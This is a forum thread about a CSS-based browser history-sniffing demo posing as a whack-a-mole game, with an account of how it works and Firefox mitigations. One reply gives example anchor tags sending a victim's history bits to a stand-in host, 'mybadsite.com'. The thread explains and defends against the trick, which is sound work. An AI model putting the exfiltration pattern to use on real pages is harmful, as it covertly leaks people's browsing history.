Jump to content

Clever hack can trick Web surfers into revealing their browsing history


Recommended Posts

This is a couple of years old, so apologies if it's already been discussed; but I just ran across this last night.

(BTW, this doesn't work in IE, or in Edge - yet - but works in Chrome, other Chromium derivatives like Opera, and FF and its derivatives.)

This demo appears at first to be a "whack-a-mole" game: you're supposed to click the "mole" as quickly as possible. But try it: when you click the "mole," it will pop up a list of these nine Web pages:

https://www.cnn.com
https://news.ycombinator.com
https://www.reddit.com
https://www.amazon.com
https://twitter.com/lcamtuf
https://www.donaldjtrump.com
https://www.farmersonly.com
https://www.diapers.com

... and will tell you which ones you've visited!

How it works: rather than being random, the mole's position depends on which combination of the above Web sites you've visited. Since there are nine Web sites, there are 2^9 or 512 possible visited/not visited combinations. So the demo actually shows 512 moles, one for each possible combination, and uses CSS "mix blend modes" to ensure only one mole is visible: the one that corresponds to your particular browsing history. Read the author's blog post for more details.

Note that although this demo uses Javascript to reveal the results, collecting the info only required HTML, CSS, and a means to convince you to click the right spot on the page, so add-ons like Noscript won't protect you. If this were a truly deceptive web page, you could imagine revealing whether you've visited any of hundreds of Web sites by playing the "game" (or by clicking apparently-innocuous links or buttons at the deceptive Web site) for a few minutes.

Countermeasures and Mitigations

There are a couple of obvious countermeasures, but you'd have to give up some functionality. You could just disable flagging visited links: in FF, toggle layout.css.visited_links_enabled in about:config to "false." In the demo, the mole will now always appear in the "no links visited" position.

Or you could give up mix blend mode instead: again in FF, toggle layout.css.mix-blend-mode.enabled to "false." This disables the "game:" the "mole" is gone, replaced with a white rectangle; but I'd wager that 99% of legit Web sites wouldn't be significantly affected. (A few might display slightly "funny" but should work OK. Besides, they'd look that way under IE/Edge anyhow, unless they have IE/Edge-specific coding, and in that case, an IE-like SSUAO is all you'd need to fix the site.)

Finally, there's a weakness in this method that makes it a bit less revealing than you might think. When I first tried it, I was surprised to learn that I hadn't visited any of the above Web sites, even though I know I at least visit amazon.com rather often. But it didn't show as "visited" because I use a bookmark to go to amazon.com, which actually goes to https://www.amazon.com/?.... Since the demo page couldn't guess the entire long string, my browser didn't show https://www.amazon.com by itself as "visited." So maybe the best mitigation is just to append a ? and some extra random garbage to all your bookmarks!

Link to comment
Share on other sites


The problem is that this demo displays data only locally, no request is sent back.

And if it was, I'd assume it could have been blocked by specific rule in uBlock, as it is already nicely recognized as inline-script.

Link to comment
Share on other sites

The demo is designed just to show what's possible; it's not designed to actually steal your browsing history! So of course no request is sent back.

6 hours ago, Mathwiz said:

... although this demo uses Javascript to reveal the results, collecting the info only required HTML, CSS, and a means to convince you to click the right spot on the page, so add-ons like Noscript won't protect you.

IOW, the "moles" could've been 512 simple links, from ...

<a href="http://mybadsite.com?user=victim1&historyBits=000" />
         ... through ...
<a href="http://mybadsite.com?user=victim1&historyBits=511" />

... so when you click one, the server just collects your data and goes to the next page.

And the demo runs fine with all of uBO's filters enabled. There's really nothing for uBO to block; that's what makes it potentially dangerous.

Link to comment
Share on other sites

Sure, no harm's done :)

The only problem I see is that in spying advertising industry changes are quick. If this technique has great potential, it would have been already used by tech companies to track users, and if this was true, tracker-blockers would have already prepared for an update :)

After all, worth knowing, but no reason to panic.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...